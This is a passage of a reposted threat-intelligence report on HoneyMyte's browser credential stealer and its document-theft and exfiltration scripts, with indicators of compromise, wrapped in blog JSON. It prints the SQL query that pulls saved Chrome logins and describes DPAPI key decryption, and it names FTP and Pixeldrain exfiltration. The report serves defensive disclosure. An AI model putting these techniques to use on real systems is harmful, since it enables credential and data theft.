exfiltration<\/p>\n<\/div>\n<p>To retrieve saved credentials, the malware executes the following SQL query on the copied database:<\/p>\n<pre class=\"urvanov-syntax-highlighter-plain-tag\">SELECT origin_url, username_value, password_value FROM logins<\/pre>\n<p>\nThis query returns the login URL, stored username, and encrypted password for each saved entry.<\/p>\n<p>Next, the malware reads the <code>Local State<\/code> file to extract the browser\u2019s encrypted master key. This key is protected using the Windows Data Protection API (DPAPI), ensuring that the encrypted data can only be decrypted by the same Windows user account that created it. The malware then uses the <code>CryptUnprotectData<\/code> API to decrypt this key, enabling it to access and decrypt password entries from the <code>Login Data<\/code> SQLite database.<\/p>\n<p>With the decrypted AES key in memory, the malware proceeds to decrypt each saved password and reconstructs complete login records.<\/p>\n<p>Finally, it saves the results to the text file <code>C:UsersPublicLibrariesLicense.txt<\/code>.<\/p>\n<h3 id=\"login-data-stealers-attribution\">Login data stealer\u2019s attribution<\/h3>\n<p>Our investigation indicated that the malware was consistently used in the ToneShell backdoor campaign, which was attributed to the HoneyMyte APT group.<br \/>\nAnother factor supporting our attribution is that the browser credential stealer appeared to be linked to the LuminousMoth APT group, which <a href=\"https:\/\/securelist.com\/apt-luminousmoth\/103332\/\" target=\"_blank\" rel=\"noopener\">has previously been connected to HoneyMyte<\/a>. Our analysis of LuminousMoth\u2019s cookie stealer revealed several code-level similarities with HoneyMyte\u2019s credential stealer. For example, both malware families used the same method to copy targeted files, such as <code>Login Data and Cookies<\/code>, into a temporary folder named <code>ChromeTmp<\/code>, indicating possible tool reuse or a shared codebase.<\/p>\n<div id=\"attachment_118672\" style=\"width: 4106px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151218\/honeymyte-updates6-scaled.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-118672\" class=\"size-full wp-image-118672\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151218\/honeymyte-updates6-scaled.png\" alt=\"Code similarity between HoneyMyte's saved login data stealer and LuminousMoth's cookie stealer\" width=\"4096\" height=\"1590\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151218\/honeymyte-updates6-scaled.png 4096w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151218\/honeymyte-updates6-300x116.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151218\/honeymyte-updates6-1024x398.png 1024w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151218\/honeymyte-updates6-768x298.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151218\/honeymyte-updates6-1536x596.png 1536w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151218\/honeymyte-updates6-2048x795.png 2048w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151218\/honeymyte-updates6-902x350.png 902w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151218\/honeymyte-updates6-740x287.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151218\/honeymyte-updates6-721x280.png 721w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151218\/honeymyte-updates6-800x311.png 800w\" sizes=\"auto, (max-width: 4096px) 100vw, 4096px\"><\/a><\/p>\n<p id=\"caption-attachment-118672\" class=\"wp-caption-text\">Code similarity between HoneyMyte\u2019s saved login data stealer and LuminousMoth\u2019s cookie stealer<\/p>\n<\/div>\n<p>Both stealers followed the same steps: they checked if the original <code>Login Data<\/code> file existed, located the temporary folder, and copied the browser data into a file with the same name.<\/p>\n<p>Based on these findings, we assess with high confidence that HoneyMyte is behind this browser credential stealer, which also has a strong connection to the LuminousMoth APT group.<\/p>\n<h2 id=\"document-theft-and-system-information-reconnaissance-scripts\">Document theft and system information reconnaissance scripts<\/h2>\n<p>In several espionage campaigns, HoneyMyte used a number of scripts to gather system information, conduct document theft activities and steal browser login data. One of these scripts is a batch file named <code>1.bat<\/code>.<\/p>\n<h3 id=\"1-bat-system-enumeration-and-data-exfiltration-batch-script\">1.bat \u2013 System enumeration and data exfiltration batch script<\/h3>\n<p>The script starts by downloading <code>curl.exe<\/code> and <code>rar.exe<\/code> into the public folder. These are the tools used for file transfer and compression.<\/p>\n<div id=\"attachment_118673\" style=\"width: 1747px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151512\/honeymyte-updates7.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-118673\" class=\"size-full wp-image-118673\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151512\/honeymyte-updates7.png\" alt=\"Batch script that downloads curl.exe and rar.exe from HoneyMyte infrastructure and executes them for file transfer and compression\" width=\"1737\" height=\"559\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151512\/honeymyte-updates7.png 1737w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151512\/honeymyte-updates7-300x97.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151512\/honeymyte-updates7-1024x330.png 1024w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151512\/honeymyte-updates7-768x247.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151512\/honeymyte-updates7-1536x494.png 1536w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151512\/honeymyte-updates7-1088x350.png 1088w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151512\/honeymyte-updates7-740x238.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151512\/honeymyte-updates7-870x280.png 870w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151512\/honeymyte-updates7-800x257.png 800w\" sizes=\"auto, (max-width: 1737px) 100vw, 1737px\"><\/a><\/p>\n<p id=\"caption-attachment-118673\" class=\"wp-caption-text\">Batch script that downloads curl.exe and rar.exe from HoneyMyte infrastructure and executes them for file transfer and compression<\/p>\n<\/div>\n<p>It then collects network details and downloads and runs the <code>nbtscan tool<\/code> for internal network scanning.<\/p>\n<div id=\"attachment_118674\" style=\"width: 1692px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151640\/honeymyte-updates8.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-118674\" class=\"size-full wp-image-118674\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151640\/honeymyte-updates8.png\" alt=\"Batch script that performs network enumeration and saves the results to the log.dat file for later exfiltration\" width=\"1682\" height=\"741\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151640\/honeymyte-updates8.png 1682w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151640\/honeymyte-updates8-300x132.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151640\/honeymyte-updates8-1024x451.png 1024w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151640\/honeymyte-updates8-768x338.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151640\/honeymyte-updates8-1536x677.png 1536w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151640\/honeymyte-updates8-794x350.png 794w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151640\/honeymyte-updates8-740x326.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151640\/honeymyte-updates8-636x280.png 636w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151640\/honeymyte-updates8-800x352.png 800w\" sizes=\"auto, (max-width: 1682px) 100vw, 1682px\"><\/a><\/p>\n<p id=\"caption-attachment-118674\" class=\"wp-caption-text\">Batch script that performs network enumeration and saves the results to the log.dat file for later exfiltration<\/p>\n<\/div>\n<p>During enumeration, the script also collects information such as stored credentials, the result of the <code>systeminfo<\/code> command, registry keys, the startup folder list, the list of files and folders, and antivirus information into a file named <code>log.dat<\/code>. It then uploads this file via FTP to <code>http:\/\/113.23.212[.]15\/pub\/<\/code>.<\/p>\n<div id=\"attachment_118675\" style=\"width: 1874px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151837\/honeymyte-updates9.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-118675\" class=\"size-full wp-image-118675\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151837\/honeymyte-updates9.png\" alt=\"Batch script that collects registry, startup items, directories, and antivirus information for system profiling\" width=\"1864\" height=\"708\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151837\/honeymyte-updates9.png 1864w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151837\/honeymyte-updates9-300x114.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151837\/honeymyte-updates9-1024x389.png 1024w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151837\/honeymyte-updates9-768x292.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151837\/honeymyte-updates9-1536x583.png 1536w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151837\/honeymyte-updates9-921x350.png 921w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151837\/honeymyte-updates9-740x281.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151837\/honeymyte-updates9-737x280.png 737w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26151837\/honeymyte-updates9-800x304.png 800w\" sizes=\"auto, (max-width: 1864px) 100vw, 1864px\"><\/a><\/p>\n<p id=\"caption-attachment-118675\" class=\"wp-caption-text\">Batch script that collects registry, startup items, directories, and antivirus information for system profiling<\/p>\n<\/div>\n<p>Next, it deletes both <code>log.dat<\/code> and the <code>nbtscan<\/code> executable to remove traces. The script then terminates browser processes, compresses browser-related folders, retrieves FileZilla configuration files, archives documents from all drives with <code>rar.exe<\/code>, and uploads the collected data to the same server.<\/p>\n<p>Finally, it deletes any remaining artifacts to cover its tracks.<\/p>\n<h3 id=\"ttraazcs32-ps1-powershell-based-collection-and-exfiltration\">Ttraazcs32.ps1 \u2013 PowerShell-based collection and exfiltration<\/h3>\n<p>The second script observed in HoneyMyte operations is a PowerShell file named <code>Ttraazcs32.ps1<\/code>.<\/p>\n<p>Similar to the batch file, this script downloads <code>curl.exe<\/code> and <code>rar.exe<\/code> into the public folder to handle file transfers and compression. It collects computer and user information, as well as network details such as the public IP address and Wi-Fi network data.<\/p>\n<p>All gathered information is written to a file, compressed into a password-protected RAR archive and uploaded via FTP.<\/p>\n<p>In addition to system profiling, the script searches multiple drives including <code>C:UsersDesktop<\/code>, Downloads, and drives D: to Z: for recently modified documents. Targeted file types include <code>.doc, .xls, .pdf, .tif<\/code>, and <code>.txt<\/code>, specifically those changed within the last 60 days. These files are also compressed into a password-protected RAR archive and exfiltrated to the same FTP server.<\/p>\n<h3 id=\"t-ps1-saved-login-data-collection-and-exfiltration\">t.ps1 \u2013 Saved login data collection and exfiltration<\/h3>\n<p>The third script attributed to HoneyMyte is a PowerShell file named <code>t.ps1<\/code>.<\/p>\n<p>The script requires a number as a parameter and creates a working directory under <code>D:temp<\/code> with that number as the directory name. The number is not related to any identifier. It is simply a numeric label that is probably used to organize stolen data by victim. If the D drive doesn\u2019t exist on the victim\u2019s machine, the new folder will be created in the current working directory.<\/p>\n<p>The script then searches the system for Chrome and Chromium-based browser files such as <code>Login Data<\/code> and <code>Local State<\/code>. It copies these files into the target directory and extracts the <code>encrypted_key<\/code> value from the <code>Local State<\/code> file. It then uses Windows DPAPI (<code>System.Security.Cryptography.ProtectedData<\/code>) to decrypt this key and writes the decrypted Base64-encoded key into a new file named <code>Local State-journal<\/code> in the same directory. For example, if the original file is <code>C:Users$username AppDataLocalGoogleChromeUser DataLocal State<\/code>, the script creates a new file <code>C:Users$usernameAppDataLocalGoogleChromeUser DataLocal State-journal<\/code>, which the attacker can later use to access stored credentials.<\/p>\n<div id=\"attachment_118676\" style=\"width: 1887px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152329\/honeymyte-updates10.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-118676\" class=\"size-full wp-image-118676\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152329\/honeymyte-updates10.png\" alt=\"PowerShell script that extracts and decrypts the Chrome encrypted_key from the Local State file before writing the result to a Local State-journal file\" width=\"1877\" height=\"472\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152329\/honeymyte-updates10.png 1877w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152329\/honeymyte-updates10-300x75.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152329\/honeymyte-updates10-1024x258.png 1024w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152329\/honeymyte-updates10-768x193.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152329\/honeymyte-updates10-1536x386.png 1536w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152329\/honeymyte-updates10-1392x350.png 1392w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152329\/honeymyte-updates10-740x186.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152329\/honeymyte-updates10-1113x280.png 1113w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152329\/honeymyte-updates10-800x201.png 800w\" sizes=\"auto, (max-width: 1877px) 100vw, 1877px\"><\/a><\/p>\n<p id=\"caption-attachment-118676\" class=\"wp-caption-text\">PowerShell script that extracts and decrypts the Chrome encrypted_key from the Local State file before writing the result to a Local State-journal file<\/p>\n<\/div>\n<p>Once the credential data is ready, the script verifies that both <code>rar.exe<\/code> and <code>curl.exe<\/code> are available. If they are not present, it downloads them directly from Google Drive. The script then compresses the collected data into a password-protected archive (the password is \u201cPIXELDRAIN\u201d) and uploads it to <code>pixeldrain.com<\/code> using the service\u2019s API, authenticated with a hardcoded token. Pixeldrain is a public file-sharing service that attackers abuse for data exfiltration.<\/p>\n<div id=\"attachment_118677\" style=\"width: 1898px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152447\/honeymyte-updates11.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-118677\" class=\"size-full wp-image-118677\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152447\/honeymyte-updates11.png\" alt=\"Script that compresses data with RAR, and exfiltrates it to Pixeldrain via API\" width=\"1888\" height=\"475\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152447\/honeymyte-updates11.png 1888w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152447\/honeymyte-updates11-300x75.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152447\/honeymyte-updates11-1024x258.png 1024w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152447\/honeymyte-updates11-768x193.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152447\/honeymyte-updates11-1536x386.png 1536w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152447\/honeymyte-updates11-1391x350.png 1391w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152447\/honeymyte-updates11-740x186.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152447\/honeymyte-updates11-1113x280.png 1113w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26152447\/honeymyte-updates11-800x201.png 800w\" sizes=\"auto, (max-width: 1888px) 100vw, 1888px\"><\/a><\/p>\n<p id=\"caption-attachment-118677\" class=\"wp-caption-text\">Script that compresses data with RAR, and exfiltrates it to Pixeldrain via API<\/p>\n<\/div>\n<p>This approach highlights HoneyMyte\u2019s shift toward using public file-sharing services to covertly exfiltrate sensitive data, especially browser login credentials.<\/p>\n<h2 id=\"conclusion\">Conclusion<\/h2>\n<p>Recent findings indicate that HoneyMyte continues to operate actively in the wild, deploying an updated toolset that includes the CoolClient backdoor, a browser login data stealer, and various document theft scripts.<\/p>\n<p>With capabilities such as keylogging, clipboard monitoring, proxy credential theft, document exfiltration, browser credential harvesting, and large-scale file theft, HoneyMyte\u2019s campaigns appear to go far beyond traditional espionage goals like document theft and persistence. These tools indicate a shift toward the active surveillance of user activity that includes capturing keystrokes, collecting clipboard data, and harvesting proxy credential.<\/p>\n<p>Organizations should remain highly vigilant against the deployment of HoneyMyte\u2019s toolset, including the CoolClient backdoor, as well as related malware families such as PlugX, ToneShell, Qreverse, and LuminousMoth. These operations are part of a sophisticated threat actor strategy designed to maintain persistent access to compromised systems while conducting high-value surveillance activities.<\/p>\n<h2 id=\"indicators-of-compromise\">Indicators of compromise<\/h2>\n<p><strong>CoolClient<\/strong><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/f518d8e5fe70d9090f6280c68a95998f\/?icid=gl_sl_opentip-lnk_sm-team_3de833817fb3d641&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">F518D8E5FE70D9090F6280C68A95998F<\/a>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 libngs.dll<br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/1a61564841bbbb8e7774cbbeb3c68d5d\/?icid=gl_sl_opentip-lnk_sm-team_894318c01666f696&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">1A61564841BBBB8E7774CBBEB3C68D5D<\/a>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 loader.dat<br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/aeb25c9a286ee4c25ca55b72a42efa2c\/?icid=gl_sl_opentip-lnk_sm-team_fc04130d090f65dc&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">AEB25C9A286EE4C25CA55B72A42EFA2C<\/a>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 main.dat<br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/6b7300a8b3f4aac40eeecfd7bc47ee7c\/?icid=gl_sl_opentip-lnk_sm-team_fefe743404cd7e59&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">6B7300A8B3F4AAC40EEECFD7BC47EE7C<\/a>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 time.dat<\/p>\n<p><strong>CoolClient plugins<\/strong><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/7aa53ba3e3f8b0453ffcfba06347ab34\/?icid=gl_sl_opentip-lnk_sm-team_97b058fceea43aa7&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">7AA53BA3E3F8B0453FFCFBA06347AB34<\/a>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ServiceMgrS.dll<br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/a1cd59f769e9e5f6a040429847ca6eae\/?icid=gl_sl_opentip-lnk_sm-team_718bb9317f7cc3ad&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">A1CD59F769E9E5F6A040429847CA6EAE<\/a>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 FileMgrS.dll<br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/1bc5329969e6bf8ef2e9e49aab003f0b\/?icid=gl_sl_opentip-lnk_sm-team_3d3a7f4241cb1312&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">1BC5329969E6BF8EF2E9E49AAB003F0B<\/a>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 RemoteShellS.dll<\/p>\n<p><strong>Browser login data stealer<\/strong><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/1a5a9c013ce1b65abc75d809a25d36a7\/?icid=gl_sl_opentip-lnk_sm-team_55c0d7bd6a921642&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">1A5A9C013CE1B65ABC75D809A25D36A7<\/a>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Variant A<br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/e1b7ef0f3ac0a0a64f86e220f362b149\/?icid=gl_sl_opentip-lnk_sm-team_7fb498c054c2b1fe&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">E1B7EF0F3AC0A0A64F86E220F362B149<\/a>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Variant B<br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/da6f89f15094fd3f74ba186954be6b05\/?icid=gl_sl_opentip-lnk_sm-team_8c2f00ed01154a07&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">DA6F89F15094FD3F74BA186954BE6B05<\/a>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Variant C<\/p>\n<p><strong>Scripts<\/strong><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/c19bd9e6f649df1df385deef94e0e8c4\/?icid=gl_sl_opentip-lnk_sm-team_464a3ec7b7241f48&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">C19BD9E6F649DF1DF385DEEF94E0E8C4<\/a>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 1.bat<br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/838b591722512368f81298c313e37412\/?icid=gl_sl_opentip-lnk_sm-team_221b7766e4310b95&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">838B591722512368F81298C313E37412<\/a>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Ttraazcs32.ps1<br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/a4d7147f0b1ca737bfc133349841aaba\/?icid=gl_sl_opentip-lnk_sm-team_5cee01690e0fa096&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">A4D7147F0B1CA737BFC133349841AABA<\/a>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 t.ps1<\/p>\n<p><strong>CoolClient C2<\/strong><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/account.hamsterxnxx.com\/?icid=gl_sl_opentip-lnk_sm-team_5cf403ffbc97958d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">account.hamsterxnxx[.]com<\/a><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/popnike-share.com\/?icid=gl_sl_opentip-lnk_sm-team_ed9693be4baf99dd&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">popnike-share[.]com<\/a><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/japan.lenovoappstore.com\/?icid=gl_sl_opentip-lnk_sm-team_fda2c599aecbd138&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">japan.Lenovoappstore[.]com<\/a><\/p>\n<p><strong>FTP server<\/strong><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/113.23.212.15\/?icid=gl_sl_opentip-lnk_sm-team_a3d36f7d2cc0892c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">113.23.212[.]15<\/a><\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Over the past few years, we\u2019ve been observing and monitoring the espionage activities of HoneyMyte (aka Mustang Panda or Bronze President) within Asia and Europe, with the Southeast Asia region being the most affected. The primary targets of most of the group\u2019s campaigns were government entities. As an APT group, HoneyMyte uses a variety of [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[251,256,247,270,504,90,501,502,248,332,505,99,232,233,506,249,503],"tags":[91],"class_list":["post-836","post","type-post","status-publish","format-standard","hentry","category-apt","category-apt-targeted-attacks","category-apt-reports","category-backdoor","category-browser","category-cybersecurity","category-firefox","category-google-chrome","category-great-research","category-honeymyte","category-infostealers","category-malware","category-malware-descriptions","category-malware-technologies","category-microsoft-edge","category-targeted-attacks","category-trojan-stealer","tag-cybersecurity"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns - Imperative Business Ventures Limited<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns - Imperative Business Ventures Limited\" \/>\n<meta property=\"og:description\" content=\"Over the past few years, we\u2019ve been observing and monitoring the espionage activities of HoneyMyte (aka Mustang Panda or Bronze President) within Asia and Europe, with the Southeast Asia region being the most affected. The primary targets of most of the group\u2019s campaigns were government entities. As an APT group, HoneyMyte uses a variety of [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/\" \/>\n<meta property=\"og:site_name\" content=\"Imperative Business Ventures Limited\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-27T09:00:36+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26190932\/SL-HoneyMyte-CoolClient-featured-990x400.jpg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"18 minutes\" \/>\n<script type=\"application\/ld+json\" 